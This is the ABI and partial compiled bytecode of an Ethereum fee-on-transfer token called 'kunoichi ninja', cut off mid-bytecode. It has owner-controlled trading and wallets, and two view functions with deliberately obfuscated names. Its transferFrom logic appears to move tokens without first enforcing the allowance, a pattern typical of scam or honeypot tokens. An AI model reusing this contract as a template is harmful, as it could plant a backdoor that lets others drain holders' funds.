[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sniper","type":"address"}],"name":"BoughtEarly","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"TransferForeignToken","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"burnWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[],"name":"_EQFIEWJFIJAkunoichininjaaFxvM","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_SIDFJOIEWJFIWAkunoichininjaaFxvM","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyBurnAkunoichininjaaFxvMFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityAkunoichininjaaFxvMFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingAkunoichininjaaFxvMFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalAkunoichininjaaFxvMFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellBurnAkunoichininjaaFxvMFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityAkunoichininjaaFxvMFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingAkunoichininjaaFxvMFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalAkunoichininjaaFxvMFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_token","type":"address"},{"internalType":"address","name":"_to","type":"address"}],"name":"transferForeignToken","outputs":[{"internalType":"bool","name":"_sent","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c06040525f600b5f6101000a81548160ff0219169083151502179055505f600b60016101000a81548160ff021916908315150217905550600c601855600c6019556040518060400160405280600e81526020017f6b756e6f69636869206e696e6a610000000000000000000000000000000000008152506040518060400160405280600e81526020017f6b756e6f69636869206e696e6a6100000000000000000000000000000000000081525081600390816100bc9190610bbb565b5080600490816100cc9190610bbb565b5050505f6100de6105d560201b60201c565b90508060065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3505f737a250d5630b4cf539739df2c5dacb4c659f2488d90506101a48160016105dc60201b60201c565b8073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610221573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906102459190610ce8565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156102aa573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906102ce9190610ce8565b6040518363ffffffff1660e01b81526004016102eb929190610d22565b6020604051808303815f875af1158015610307573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061032b9190610ce8565b73ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff168152505061037160a05160016105dc60201b60201c565b61038460a051600161063460201b60201c565b5f5f90505f5f90505f5f90505f5f90505f5f90505f5f90505f6705d697537a8f200090506103e880826103b79190610d76565b6103c19190610de4565b6008819055506103e880826103d69190610d76565b6103e09190610de4565b600a81905550612710600a826103f69190610d76565b6104009190610de4565b60098190555086600f819055508560108190555084601181905550601154601054600f5461042e9190610e14565b6104389190610e14565b600e819055508360138190555082601481905550816015819055506015546014546013546104669190610e14565b6104709190610e14565b6012819055503360075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506104d46104c76106d260201b60201c565b60016106fa60201b60201c565b6104e53060016106fa60201b60201c565b61051760075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016106fa60201b60201c565b6105356105286106d260201b60201c565b60016105dc60201b60201c565b6105463060016105dc60201b60201c565b61057860075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016105dc60201b60201c565b6105a033606460028461058b9190610d76565b6105959190610de4565b6107a060201b60201c565b6105c83060646062846105b39190610d76565b6105bd9190610de4565b6107a060201b60201c565b5050505050505050610f82565b5f33905090565b80601b5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b80601c5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b80601a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516107949190610e61565b60405180910390a25050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361080e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161080590610ed4565b60405180910390fd5b6108238160025461092160201b90919060201c565b600281905550610878815f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461092160201b90919060201c565b5f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516109159190610f01565b60405180910390a35050565b5f5f828461092f9190610e14565b905083811015610974576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161096b90610f64565b60405180910390fd5b8091505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806109f957607f821691505b602082108103610a0c57610a0b6109b5565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302610a6e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610a33565b610a788683610a33565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f610abc610ab7610ab284610a90565b610a99565b610a90565b9050919050565b5f819050919050565b610ad583610aa2565b610ae9610ae182610ac3565b848454610a3f565b825550505050565b5f5f905090565b610b00610af1565b610b0b818484610acc565b505050565b5b81811015610b2e57610b235f82610af8565b600181019050610b11565b5050565b601f821115610b7357610b4481610a12565b610b4d84610a24565b81016020851015610b5c578190505b610b70610b6885610a24565b830182610b10565b50505b505050565b5f82821c905092915050565b5f610b935f1984600802610b78565b1980831691505092915050565b5f610bab8383610b84565b9150826002028217905092915050565b610bc48261097e565b67ffffffffffffffff811115610bdd57610bdc610988565b5b610be782546109e2565b610bf2828285610b32565b5f60209050601f831160018114610c23575f8415610c11578287015190505b610c1b8582610ba0565b865550610c82565b601f198416610c3186610a12565b5f5b82811015610c5857848901518255600182019150602085019450602081019050610c33565b86831015610c755784890151610c71601f891682610b84565b8355505b6001600288020188555050505b505050505050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610cb782610c8e565b9050919050565b610cc781610cad565b8114610cd1575f5ffd5b50565b5f81519050610ce281610cbe565b92915050565b5f60208284031215610cfd57610cfc610c8a565b5b5f610d0a84828501610cd4565b91505092915050565b610d1c81610cad565b82525050565b5f604082019050610d355f830185610d13565b610d426020830184610d13565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f610d8082610a90565b9150610d8b83610a90565b9250828202610d9981610a90565b91508282048414831517610db057610daf610d49565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f610dee82610a90565b9150610df983610a90565b925082610e0957610e08610db7565b5b828204905092915050565b5f610e1e82610a90565b9150610e2983610a90565b9250828201905080821115610e4157610e40610d49565b5b92915050565b5f8115159050919050565b610e5b81610e47565b82525050565b5f602082019050610e745f830184610e52565b92915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f610ebe601f83610e7a565b9150610ec982610e8a565b602082019050919050565b5f6020820190508181035f830152610eeb81610eb2565b9050919050565b610efb81610a90565b82525050565b5f602082019050610f145f830184610ef2565b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f610f4e601b83610e7a565b9150610f5982610f1a565b602082019050919050565b5f6020820190508181035f830152610f7b81610f42565b9050919050565b60805160a051613fe3610fc65f395f610c8601525f8181610a0c015281816124d8015281816124ff01528181612ddb01528181612eba0152612ee10152613fe35ff3fe608060405260043610610233575f3560e01c8063715018a61161012d578063b62496f5116100aa578063d0a5ec3b1161006e578063d0a5ec3b1461085e578063dd62ed3e14610888578063e2f45605146108c4578063f2fde38b146108ee578063f8b45b05146109165761023a565b8063b62496f51461077a578063b823d167146107b6578063bbc0c742146107e0578063c2d1d2e81461080a578063c8c8ebe4146108345761023a565b80638a8c523c116100f15780638a8c523c146106985780638da5cb5b146106ae57806395d89b41146106d8578063a457c2d714610702578063a9059cbb1461073e5761023a565b8063715018a6146105c85780637341cdbd146105de57806375f0a8741461060857806380eb913a146106325780638366e79a1461065c5761023a565b806339509351116101bb57806365f099f41161017f57806365f099f4146104e45780636795dade1461050e5780636bb0bf81146105385780636ddd17131461056257806370a082311461058c5761023a565b806339509351146103ee57806349bd5a5e1461042a5780634fbee193146104545780636010c1b5146104905780636095588d146104ba5761023a565b806318160ddd1161020257806318160ddd1461030a5780631a8145bb146103345780631f3fed8f1461035e57806323b872dd14610388578063313ce567146103c45761023a565b806306fdde031461023e578063095ea7b31461026857806310d5de53146102a45780631694505e146102e05761023a565b3661023a57005b5f5ffd5b348015610249575f5ffd5b50610252610940565b60405161025f9190613060565b60405180910390f35b348015610273575f5ffd5b5061028e60048036038101906102899190613111565b6109d0565b60405161029b9190613169565b60405180910390f35b3480156102af575f5ffd5b506102ca60048036038101906102c59190613182565b6109ed565b6040516102d79190613169565b60405180910390f35b3480156102eb575f5ffd5b506102f4610a0a565b6040516103019190613208565b60405180910390f35b348015610315575f5ffd5b5061031e610a2e565b60405161032b9190613230565b60405180910390f35b34801561033f575f5ffd5b50610348610a37565b6040516103559190613230565b60405180910390f35b348015610369575f5ffd5b50610372610a3d565b60405161037f9190613230565b60405180910390f35b348015610393575f5ffd5b506103ae60048036038101906103a99190613249565b610a43565b6040516103bb9190613169565b60405180910390f35b3480156103cf575f5ffd5b506103d8610bce565b6040516103e591906132b4565b60405180910390f35b3480156103f9575f5ffd5b50610414600480360381019061040f9190613111565b610bd6565b6040516104219190613169565b60405180910390f35b348015610435575f5ffd5b5061043e610c84565b60405161044b91906132dc565b60405180910390f35b34801561045f575f5ffd5b5061047a60048036038101906104759190613182565b610ca8565b6040516104879190613169565b60405180910390f35b34801561049b575f5ffd5b506104a4610cfa565b6040516104b19190613230565b60405180910390f35b3480156104c5575f5ffd5b506104ce610d00565b6040516104db9190613230565b60405180910390f35b3480156104ef575f5ffd5b506104f8610d06565b6040516105059190613230565b60405180910390f35b348015610519575f5ffd5b50610522610d0c565b60405161052f9190613230565b60405180910390f35b348015610543575f5ffd5b5061054c610d12565b6040516105599190613230565b60405180910390f35b34801561056d575f5ffd5b50610576610d18565b6040516105839190613169565b60405180910390f35b348015610597575f5ffd5b506105b260048036038101906105ad9190613182565b610d2b565b6040516105bf9190613230565b60405180910390f35b3480156105d3575f5ffd5b506105dc610d70565b005b3480156105e9575f5ffd5b506105f2610ec3565b6040516105ff9190613230565b60405180910390f35b348015610613575f5ffd5b5061061c610ec9565b60405161062991906132dc565b60405180910390f35b34801561063d575f5ffd5b50610646610eee565b6040516106539190613230565b60405180910390f35b348015610667575f5ffd5b50610682600480360381019061067d91906132f5565b610ef4565b60405161068f9190613169565b60405180910390f35b3480156106a3575f5ffd5b506106ac611131565b005b3480156106b9575f5ffd5b506106c2611210565b6040516106cf91906132dc565b60405180910390f35b3480156106e3575f5ffd5b506106ec611238565b6040516106f99190613060565b60405180910390f35b34801561070d575f5ffd5b5061072860048036038101906107239190613111565b6112c8565b6040516107359190613169565b60405180910390f35b348015610749575f5ffd5b50610764600480360381019061075f9190613111565b611390565b6040516107719190613169565b60405180910390f35b348015610785575f5ffd5b506107a0600480360381019061079b9190613182565b6113ad565b6040516107ad9190613169565b60405180910390f35b3480156107c1575f5ffd5b506107ca6113ca565b6040516107d79190613230565b60405180910390f35b3480156107eb575f5ffd5b506107f46113d0565b6040516108019190613169565b60405180910390f35b348015610815575f5ffd5b5061081e6113e2565b60405161082b9190613230565b60405180910390f35b34801561083f575f5ffd5b506108486113e8565b6040516108559190613230565b60405180910390f35b348015610869575f5ffd5b506108726113ee565b60405161087f91906132dc565b60405180910390f35b348015610893575f5ffd5b506108ae60048036038101906108a991906132f5565b611413565b6040516108bb9190613230565b60405180910390f35b3480156108cf575f5ffd5b506108d8611495565b6040516108e59190613230565b60405180910390f35b3480156108f9575f5ffd5b50610914600480360381019061090f9190613182565b61149b565b005b348015610921575f5ffd5b5061092a61165d565b6040516109379190613230565b60405180910390f35b60606003805461094f90613360565b80601f016020809104026020016040519081016040528092919081815260200182805461097b90613360565b80156109c65780601f1061099d576101008083540402835291602001916109c6565b820191905f5260205f20905b8154815290600101906020018083116109a957829003601f168201915b5050505050905090565b5f6109e36109dc611663565b848461166a565b6001905092915050565b601b602052805f5260405f205f915054906101000a900460ff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f600254905090565b60175481565b60165481565b5f610a4f84848461182d565b5f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610a96611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205410158015610b0a57508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015610bbc5750610bbb84610b1d611663565b60055485610b2b91906133bd565b60015f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610b71611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610bb591906133fe565b876122ae565b5b80610bc5575060015b90509392505050565b5f6009905090565b5f610c7a610be2611663565b84610c758560015f610bf2611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461247590919063ffffffff16565b61166a565b6001905092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f601a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b60105481565b600c5481565b60135481565b60145481565b600e5481565b600b60019054906101000a900460ff1681565b5f5f5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610d78611663565b73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e06576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dfd9061347b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f60065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60115481565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b5f610efd611663565b73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f829061347b565b60405180910390fd5b3073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ff9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff0906134e3565b60405180910390fd5b5f8373ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b815260040161103391906132dc565b602060405180830381865afa15801561104e573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110729190613515565b90508373ffffffffffffffffffffffffffffffffffffffff1663a9059cbb84836040518363ffffffff1660e01b81526004016110af929190613540565b6020604051808303815f875af11580156110cb573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110ef9190613591565b91507fdeda980967fcead7b61e78ac46a4da14274af29e894d4d61e8b81ec38ab3e4388482604051611122929190613540565b60405180910390a15092915050565b611139611663565b73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146111c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111be9061347b565b60405180910390fd5b6111d96111d330610d2b565b476124d2565b6001600b5f6101000a81548160ff0219169083151502179055506001600b60016101000a81548160ff021916908315150217905550565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606004805461124790613360565b80601f016020809104026020016040519081016040528092919081815260200182805461127390613360565b80156112be5780601f10611295576101008083540402835291602001916112be565b820191905f5260205f20905b8154815290600101906020018083116112a157829003601f168201915b5050505050905090565b5f6113866112d4611663565b8461138185604051806060016040528060258152602001613f896025913960015f6112fd611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546125ab9092919063ffffffff16565b61166a565b6001905092915050565b5f6113a361139c611663565b848461182d565b6001905092915050565b601c602052805f5260405f205f915054906101000a900460ff1681565b600f5481565b600b5f9054906101000a900460ff1681565b60125481565b60085481565b600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60095481565b6114a3611663565b73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611531576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115289061347b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361159f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115969061362c565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a38060065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600a5481565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036116d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116cf906136ba565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161173d90613748565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516118209190613230565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361189b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611892906137d6565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611909576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161190090613864565b60405180910390fd5b5f81036119205761191b83835f61260d565b6122a9565b611928611210565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141580156119965750611966611210565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156119ce57505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611a08575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611a215750600660149054906101000a900460ff16155b15611dee57600b5f9054906101000a900460ff16611b1457601a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611ad45750601a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611b13576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0a906138cc565b60405180910390fd5b5b601c5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611bb15750601b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611c5857600854811115611bfb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bf29061395a565b60405180910390fd5b600a54611c0783610d2b565b82611c129190613978565b1115611c53576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c4a906139f5565b60405180910390fd5b611ded565b601c5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611cf55750601b5f8473fffffffff